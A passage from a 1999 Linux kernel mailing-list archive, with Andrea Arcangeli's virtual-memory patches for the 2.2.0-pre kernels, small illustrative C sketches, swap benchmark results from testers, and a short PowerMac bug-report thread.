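name is changed to make clear it is not the patch itself.

```c
/* Stand-ins for the kernel functions; all of these are hypothetical. */
int fake_swap_out_result;	/* value the fake swap_out() returns */
int fake_shrink_result;		/* value the fake shrink_mmap() returns */
int shrink_calls;		/* how many times shrink_mmap() was tried */

int fake_swap_out(int priority, int gfp_mask)
{
	(void)priority;
	(void)gfp_mask;
	return fake_swap_out_result;
}

int fake_shrink_mmap(int priority, int gfp_mask)
{
	(void)priority;
	(void)gfp_mask;
	shrink_calls++;
	return fake_shrink_result;
}

/* Returns 1 if some progress was made, 0 otherwise. */
int free_user_and_cache_sketch(int priority, int gfp_mask)
{
	switch (fake_swap_out(priority, gfp_mask)) {
	case 0:
		/* nothing reached the swap cache: only the cache can help */
		return fake_shrink_mmap(priority, gfp_mask) ? 1 : 0;
	case 1:
		/* something was swapped out and a page was really freed */
		return 1;
	default:
		/*
		 * 2 or more: the page is in the swap cache but still
		 * referenced, so let shrink_mmap() try to free something.
		 * Swapping progress was made, so report success anyway.
		 */
		fake_shrink_mmap(priority, gfp_mask);
		return 1;
	}
}
```

Only case 1 skips shrink_mmap(); in the other two cases it is the step
that can actually release a page.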

Comments?

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 51%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01  0:16 64%     ` Steve Bergman
@ 1999-01-01 17:16 64%       ` Andrea Arcangeli
  0 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-01 17:16 UTC (permalink / raw)
  To: Steve Bergman; +Cc: linux-mm

On Thu, 31 Dec 1998, Steve Bergman wrote:

> I just tried out the patch and got very disappointing results on my
> 128MB AMD K6-3.  I tested by loading 117 good sized images all at once. 

The point of my patch is to balance the VM and improve performance for
programs that are not thrashing memory. It makes sense that the thrashing
program is slowed down... Once the program stops allocating RAM and
continues to use only pages already allocated (possibly in swap),
performance should return to normal.

> patch (still running under the patched 2.2.0-pre1) and noted that during
> the compile I had 17MB in the swap with nothing else going on.  Bringing
> up netscape put it up to 25MB.   Suggestions? Requests?  Let me know if

I am certainly still going to change something. But please don't worry
about the size of the swap; care only about performance. The pages in the
swap right now are likely to be present in the swap cache as well, so you
get both aging and a cheap swapin by making more use of the swap cache.
There is also the cost of an async swapout to disk, but it does not seem
to hurt here.

> you want me to try anything else.

Yes, you should tell me if performance decreased under normal usage
(like netscape + kernel compile).

Andrea Arcangeli

^ permalink raw reply	[relevance 64%]

* Re: BUG: 2.2.0-pre2 on 5500 (and maybe 6500)
  1999-01-01 14:29 60% BUG: 2.2.0-pre2 on 5500 (and maybe 6500) Jens Ch. Restemeier
@ 1999-01-01 19:44 64% ` Tom Rini
  1999-01-02  9:31 64%   ` Jens Ch. Restemeier
  1999-01-02  0:47 64% ` Ian K. Erickson
  1 sibling, 1 reply; 200+ results
From: Tom Rini @ 1999-01-01 19:44 UTC (permalink / raw)
  To: Jens Ch. Restemeier; +Cc: linuxppc-dev


On Fri, 1 Jan 1999, Jens Ch. Restemeier wrote:

> This bug report applies to a PMac 5500/225, and possibly to the 6500 as
> well, because they share a common motherboard.
> I'm booting the 2.2.0-pre2 kernel with BootX.

Well, the all-important question is: does this show up with a vger kernel
(2.1.130)?

---
Tom Rini (TR1265)
http://dobbstown.yeti.edu/


^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01 16:44 51%     ` Andrea Arcangeli
@ 1999-01-01 20:02 38%       ` Andrea Arcangeli
  1999-01-01 23:46 64%         ` Steve Bergman
  1999-01-02  3:03 38%         ` Andrea Arcangeli
  0 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-01 20:02 UTC (permalink / raw)
  To: Benjamin Redelings I, Stephen C. Tweedie, Linus Torvalds
  Cc: linux-kernel, Alan Cox, Rik van Riel, linux-mm

I rediffed my VM patch against test1-patch-2.2.0-pre3.gz. I also fixed
some bugs (not totally critical, but..) pointed out by Linus in my last
code. I also changed shrink_mmap(0) to shrink_mmap(priority) because
it was costing a lot of performance. There is no need to do a
shrink_mmap(0) if, for example, the cache/buffers are under min. In that
case we must allow swap_out() to grow the cache before we start shrinking
it.

So basically this new patch is _far_ more efficient than the last
one (I have never seen such good/stable/fast behavior before!).

This new patch is against testing/test1-patch-2.2.0-pre3.gz, which is
against v2.1/2.2.0-pre2, which is against patch-2.2.0-pre1-vs-2.1.132.gz
(where is this last one now?).

Ah, testing/test1-patch-2.2.0-pre3.gz was missing the trashing_memory
initialization that allows every process to do a fast start.

Index: linux/kernel/fork.c
diff -u linux/kernel/fork.c:1.1.1.3 linux/kernel/fork.c:1.1.1.1.2.6
--- linux/kernel/fork.c:1.1.1.3	Thu Dec  3 12:55:12 1998
+++ linux/kernel/fork.c	Thu Dec 31 17:56:28 1998
@@ -567,6 +570,7 @@
 
 	/* ok, now we should be set up.. */
 	p->swappable = 1;
+	p->trashing_memory = 0;
 	p->exit_signal = clone_flags & CSIGNAL;
 	p->pdeath_signal = 0;
 
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.8 linux/mm/vmscan.c:1.1.1.1.2.49
--- linux/mm/vmscan.c:1.1.1.8	Fri Jan  1 19:12:54 1999
+++ linux/mm/vmscan.c	Fri Jan  1 20:29:19 1999
@@ -162,8 +162,9 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
+				entry = atomic_read(&page_map->count);
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return entry;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +181,9 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return 1;	/* we slept: the process may not exist any more */
+		return entry;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +196,9 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return entry;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,7 +213,7 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
+	entry = atomic_read(&page_map->count);
 	__free_page(page_map);
 	return entry;
 }
@@ -369,8 +372,14 @@
 	 * swapped out.  If the swap-out fails, we clear swap_cnt so the 
 	 * task won't be selected again until all others have been tried.
 	 */
-	counter = ((PAGEOUT_WEIGHT * nr_tasks) >> 10) >> priority;
+	counter = nr_tasks / (priority+1);
+	if (counter < 1)
+		counter = 1;
+	if (counter > nr_tasks)
+		counter = nr_tasks;
+
 	for (; counter >= 0; counter--) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -382,15 +391,8 @@
 				continue;
 	 		if (p->mm->rss <= 0)
 				continue;
-			if (assign) {
-				/* 
-				 * If we didn't select a task on pass 1, 
-				 * assign each task a new swap_cnt.
-				 * Normalise the number of pages swapped
-				 * by multiplying by (RSS / 1MB)
-				 */
-				p->swap_cnt = AGE_CLUSTER_SIZE(p->mm->rss);
-			}
+			if (assign)
+				p->swap_cnt = p->mm->rss;
 			if (p->swap_cnt > max_cnt) {
 				max_cnt = p->swap_cnt;
 				pbest = p;
@@ -404,14 +406,13 @@
 			}
 			goto out;
 		}
-		pbest->swap_cnt--;
-
 		/*
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-				return 1;
+		retval = swap_out_process(pbest, gfp_mask);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -438,44 +439,74 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	switch (swap_out(priority, gfp_mask))
+	{
+	default:
+		shrink_mmap(priority, gfp_mask);
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+	case 0:
+		/* swap_out() failed to swapout */
+		if (shrink_mmap(priority, gfp_mask))
+			return 1;
+		return 0;
+	case 1:
+		/* this would be the best but should not happen right now */
+		printk(KERN_DEBUG
+		       "do_free_user_and_cache: swapout returned 1\n");
+		return 1;
+	}
+}
 
-static int kswapd_free_pages(int kswapd_state)
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 6;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	kmem_cache_reap(gfp_mask);
 
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 2;
+		case 2:
+			shrink_dcache_memory(priority, gfp_mask);
+			*state = 0;
+		} while (--priority >= 0);
+	}
+	return 0;
+}
+
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 5;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				kswapd_state++;
-			case 2:
-				free_memory(swap_out(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -523,6 +554,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -542,35 +574,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 5;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -593,7 +613,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -631,9 +652,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -642,7 +662,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }
Index: linux/mm/swap_state.c
diff -u linux/mm/swap_state.c:1.1.1.4 linux/mm/swap_state.c:1.1.1.1.2.9
--- linux/mm/swap_state.c:1.1.1.4	Fri Jan  1 19:12:54 1999
+++ linux/mm/swap_state.c	Fri Jan  1 19:25:33 1999
@@ -262,6 +262,9 @@
 struct page * lookup_swap_cache(unsigned long entry)
 {
 	struct page *found;
+#ifdef	SWAP_CACHE_INFO
+	swap_cache_find_total++;
+#endif
 	
 	while (1) {
 		found = find_page(&swapper_inode, entry);
@@ -269,8 +272,12 @@
 			return 0;
 		if (found->inode != &swapper_inode || !PageSwapCache(found))
 			goto out_bad;
-		if (!PageLocked(found))
+		if (!PageLocked(found)) {
+#ifdef	SWAP_CACHE_INFO
+			swap_cache_find_success++;
+#endif
 			return found;
+		}
 		__free_page(found);
 		__wait_on_page(found);
 	}




If this patch decreases performance for you (possibly because too much
memory gets swapped out) you can try this incremental patch (which I have
not tried here, btw):

Index: mm//vmscan.c
===================================================================
RCS file: /var/cvs/linux/mm/vmscan.c,v
retrieving revision 1.1.1.1.2.49
diff -u -r1.1.1.1.2.49 vmscan.c
--- vmscan.c	1999/01/01 19:29:19	1.1.1.1.2.49
+++ linux/mm/vmscan.c	1999/01/01 19:51:22
@@ -441,6 +441,9 @@
 
 static int do_free_user_and_cache(int priority, int gfp_mask)
 {
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
+
 	switch (swap_out(priority, gfp_mask))
 	{
 	default:



I wrote a swap benchmark that dirties 160 Mbyte of VM. For the
first loop 2.2-pre1 took 106 sec, for the second loop 120, and
then it got worse.

test1-pre3 + the new patch in this email instead takes 120 sec in the
first loop (since it's allocating, it's probably slowed down a bit by the
trashing_memory heuristic, and that's right), then 90 sec in the
second loop and 77 sec in the third loop!! And the system was far from
idle (as when I measured 2.2-pre1): I was using it without taking special
care and it was perfectly usable (2.2-pre1 was unusable instead).
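
A benchmark of this kind can be sketched roughly as follows. This is not
the program that produced the numbers above, only a guess at its general
shape: dirty_memory() and its parameters are invented for the example,
and timing each loop is left to the caller.

```c
#include <stdlib.h>

/*
 * Dirty every page of a freshly allocated buffer, `loops` times over.
 * Returns the number of page writes performed, or 0 if page_size is 0
 * or the allocation fails. The page size is supplied by the caller
 * (4096 on i386).
 */
size_t dirty_memory(size_t bytes, int loops, size_t page_size)
{
	volatile unsigned char *buf;
	size_t off, writes = 0;
	int i;

	if (page_size == 0)
		return 0;
	buf = malloc(bytes);
	if (!buf)
		return 0;

	for (i = 0; i < loops; i++) {
		/* one write per page is enough to make the page dirty */
		for (off = 0; off < bytes; off += page_size) {
			buf[off] = (unsigned char)(i + 1);
			writes++;
		}
	}
	free((void *)buf);
	return writes;
}
```

Calling dirty_memory(160UL << 20, 3, 4096) on a machine with less RAM
than that forces the later loops to pull pages back in from swap, which
is the case the loop times above are about.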

Comments?

^ permalink raw reply	[relevance 38%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01 20:02 38%       ` Andrea Arcangeli
@ 1999-01-01 23:46 64%         ` Steve Bergman
  1999-01-02  6:55 46%           ` Linus Torvalds
  1999-01-02  3:03 38%         ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Steve Bergman @ 1999-01-01 23:46 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Benjamin Redelings I, Stephen C. Tweedie, Linus Torvalds,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

Andrea Arcangeli wrote:


> 
> Please stop and try my new patch against Linus's test1-pre3 (that just
> merge some of my new stuff).

I got the patch and I must say I'm impressed.  I ran my "117 image" test
and got these results:

[Note: This loads 117 different images at the same time using 117
separate instances of 'xv' started in the background and results in ~
165 MB of swap area usage.  The machine is an AMD K6-2 300 with 128MB]


2.1.131-ac11                         172 sec  (This was previously the best)
2.2.0-pre1 + Arcangeli's 1st patch   400 sec
test1-pre  + Arcangeli's 2nd patch   119 sec (!)

Processor utilization was substantially greater with the new patch
compared to either of the others.  Before it starts using swap, memory
is being consumed at ~ 4MB/sec.  After it starts to swap out, it streams
out at ~ 2MB/sec.

In this test the new patch gets the job done ~ 45% faster than ac11
(172/119 = 1.45) and takes ~ 70% less time than 2.2.0-pre1 (119 sec
vs. 400 sec).
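
The two percentages can be checked against the timings in the table.
Note that they are two different measures: ~ 45% is the gain in speed
over ac11, while ~ 70% is the reduction in run time compared with the
400 sec run. A small sketch of both calculations, with helper names made
up for the example:

```c
/* How much more work per second the new run gets done, in percent. */
double speedup_percent(double old_sec, double new_sec)
{
	return (old_sec / new_sec - 1.0) * 100.0;
}

/* How much shorter the new run is, in percent of the old run time. */
double time_saved_percent(double old_sec, double new_sec)
{
	return (old_sec - new_sec) / old_sec * 100.0;
}
```

For 172 sec vs. 119 sec these give about 44.5% and 30.8%; for 400 sec
vs. 119 sec they give about 236% and 70.3%.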

I was going to test the low memory case but got sidetracked.


Thanks,
Steve

^ permalink raw reply	[relevance 64%]

* Re: BUG: 2.2.0-pre2 on 5500 (and maybe 6500)
  1999-01-01 14:29 60% BUG: 2.2.0-pre2 on 5500 (and maybe 6500) Jens Ch. Restemeier
  1999-01-01 19:44 64% ` Tom Rini
@ 1999-01-02  0:47 64% ` Ian K. Erickson
  1 sibling, 0 replies; 200+ results
From: Ian K. Erickson @ 1999-01-02  0:47 UTC (permalink / raw)
  To: Jens Ch. Restemeier; +Cc: linuxppc-dev


On Fri, 1 Jan 1999, Jens Ch. Restemeier wrote:
> P.S.: A patch? I'd like to write one, but I don't have much information
> about the hardware. What about starting a project to document all the
> devices in a Mac?

I'll second that. There may be legal issues (NDAs?) involved in having
linuxppc share some hardware info, but I hope I am wrong.

Ian K. Erickson                 iPEG, the Internet Productivity Group
Systems Administrator           W 422 Riverside, Suite 628
ian@ipeg.com                    Spokane, WA 99204
http://www.ipeg.com             (509)462-iPEG

4F6E65204F5320746F2072756C65207468656D20616C6C2C204F6E65204F5320746
F2066696E64207468656D2CDA4F6E65204F5320746F206272696E67207468656D20
616C6C20616E6420696E20746865206461726B6E6573732062696E64207468656D 


^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01 20:02 38%       ` Andrea Arcangeli
  1999-01-01 23:46 64%         ` Steve Bergman
@ 1999-01-02  3:03 38%         ` Andrea Arcangeli
  1 sibling, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-02  3:03 UTC (permalink / raw)
  To: Benjamin Redelings I, Stephen C. Tweedie, Linus Torvalds,
	Steve Bergman
  Cc: linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Fri, 1 Jan 1999, Andrea Arcangeli wrote:

> I rediffed my VM patch against test1-patch-2.2.0-pre3.gz. I also fixed
> some bugs (not totally critical, but..) pointed out by Linus in my last
> code. I also changed shrink_mmap(0) to shrink_mmap(priority) because
> it was costing a lot of performance. There is no need to do a
> shrink_mmap(0) if, for example, the cache/buffers are under min. In that
> case we must allow swap_out() to grow the cache before we start shrinking
> it.
> 
> So basically this new patch is _far_ more efficient than the last
> one (I have never seen such good/stable/fast behavior before!).

Hmm, I just found a big problem: the patch was perfect as long as there
was no I/O bound application running.

When an I/O bound application starts to read/write through the fs, the
buffers and the cache grow, so kswapd has to use do_free_user_and_cache()
to make space for the new data in the cache.

The problem with my last approach is that do_free_user_and_cache() was
always generating I/O to asynchronously put some part of user memory into
swap. This had a _bad_ impact on the I/O performance of the I/O bound
process :(.

I am the first to hate seeing swapin/swapout while there are
tons of freeable memory used in cache/buffers.

So I obviously changed something. This new patch fixes the problem
fine; even if it doesn't achieve the same interactive performance as
before under heavy swapping (but it's close), it's a bit more sane ;).
The system is still perfectly balanced, though, and now there is no
unnecessary swapin/swapout under heavy fs operation while there is a lot
of freeable memory.
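
The effect of trying the cache before swapping can be illustrated with a
toy model. This is not the kernel code: struct toy_vm and toy_free_page()
are invented for the illustration, and the real shrink_mmap() can of
course fail even when cache pages exist.

```c
/* Toy model of reclaimable memory; made up for this sketch. */
struct toy_vm {
	int freeable_cache_pages;	/* clean cache/buffer pages */
	int user_pages;			/* pages that would need swap I/O */
	int swap_ios;			/* swap writes issued so far */
};

/* Free one page, preferring the cache. Returns 1 on progress, else 0. */
int toy_free_page(struct toy_vm *vm)
{
	if (vm->freeable_cache_pages > 0) {
		vm->freeable_cache_pages--;	/* shrink_mmap()-like, no I/O */
		return 1;
	}
	if (vm->user_pages > 0) {
		vm->user_pages--;		/* swap_out()-like step */
		vm->swap_ios++;
		return 1;
	}
	return 0;
}
```

As long as freeable_cache_pages is non-zero, swap_ios stays at 0, which
is the behaviour an I/O bound process wants from the reclaim path.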

Since to be happy I always need to change something more than what is
needed, I also moved kmem_cache_reap() next to shrink_dcache_memory().

Here is a new patch against test1-pre3. Steve, if you are going
to make a comparison, let me know the results of course! Thanks.

You can also try increasing priority = 8 in vmscan.c to 9 and see if the
benchmark improves that way...

Index: linux/kernel/fork.c
diff -u linux/kernel/fork.c:1.1.1.3 linux/kernel/fork.c:1.1.1.1.2.6
--- linux/kernel/fork.c:1.1.1.3	Thu Dec  3 12:55:12 1998
+++ linux/kernel/fork.c	Thu Dec 31 17:56:28 1998
@@ -567,6 +570,7 @@
 
 	/* ok, now we should be set up.. */
 	p->swappable = 1;
+	p->trashing_memory = 0;
 	p->exit_signal = clone_flags & CSIGNAL;
 	p->pdeath_signal = 0;
 
Index: linux/mm/swap_state.c
diff -u linux/mm/swap_state.c:1.1.1.4 linux/mm/swap_state.c:1.1.1.1.2.9
--- linux/mm/swap_state.c:1.1.1.4	Fri Jan  1 19:12:54 1999
+++ linux/mm/swap_state.c	Fri Jan  1 19:25:33 1999
@@ -262,6 +262,9 @@
 struct page * lookup_swap_cache(unsigned long entry)
 {
 	struct page *found;
+#ifdef	SWAP_CACHE_INFO
+	swap_cache_find_total++;
+#endif
 	
 	while (1) {
 		found = find_page(&swapper_inode, entry);
@@ -269,8 +272,12 @@
 			return 0;
 		if (found->inode != &swapper_inode || !PageSwapCache(found))
 			goto out_bad;
-		if (!PageLocked(found))
+		if (!PageLocked(found)) {
+#ifdef	SWAP_CACHE_INFO
+			swap_cache_find_success++;
+#endif
 			return found;
+		}
 		__free_page(found);
 		__wait_on_page(found);
 	}
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.8 linux/mm/vmscan.c:1.1.1.1.2.51
--- linux/mm/vmscan.c:1.1.1.8	Fri Jan  1 19:12:54 1999
+++ linux/mm/vmscan.c	Sat Jan  2 04:18:31 1999
@@ -10,6 +10,11 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm: do_free_user_and_cache().
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -162,8 +167,9 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
+				entry = atomic_read(&page_map->count);
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return entry;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +186,9 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return 1;	/* we slept: the process may not exist any more */
+		return entry;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +201,9 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return entry;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,7 +218,7 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
+	entry = atomic_read(&page_map->count);
 	__free_page(page_map);
 	return entry;
 }
@@ -369,8 +377,14 @@
 	 * swapped out.  If the swap-out fails, we clear swap_cnt so the 
 	 * task won't be selected again until all others have been tried.
 	 */
-	counter = ((PAGEOUT_WEIGHT * nr_tasks) >> 10) >> priority;
+	counter = nr_tasks / (priority+1);
+	if (counter < 1)
+		counter = 1;
+	if (counter > nr_tasks)
+		counter = nr_tasks;
+
 	for (; counter >= 0; counter--) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -382,15 +396,8 @@
 				continue;
 	 		if (p->mm->rss <= 0)
 				continue;
-			if (assign) {
-				/* 
-				 * If we didn't select a task on pass 1, 
-				 * assign each task a new swap_cnt.
-				 * Normalise the number of pages swapped
-				 * by multiplying by (RSS / 1MB)
-				 */
-				p->swap_cnt = AGE_CLUSTER_SIZE(p->mm->rss);
-			}
+			if (assign)
+				p->swap_cnt = p->mm->rss;
 			if (p->swap_cnt > max_cnt) {
 				max_cnt = p->swap_cnt;
 				pbest = p;
@@ -404,14 +411,13 @@
 			}
 			goto out;
 		}
-		pbest->swap_cnt--;
-
 		/*
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-				return 1;
+		retval = swap_out_process(pbest, gfp_mask);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -438,44 +444,64 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	if (swap_out(priority, gfp_mask))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 2;
+		case 2:
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+			*state = 0;
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 5;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				kswapd_state++;
-			case 2:
-				free_memory(swap_out(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -523,6 +549,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -542,35 +569,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 5;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -593,7 +608,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -631,9 +647,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
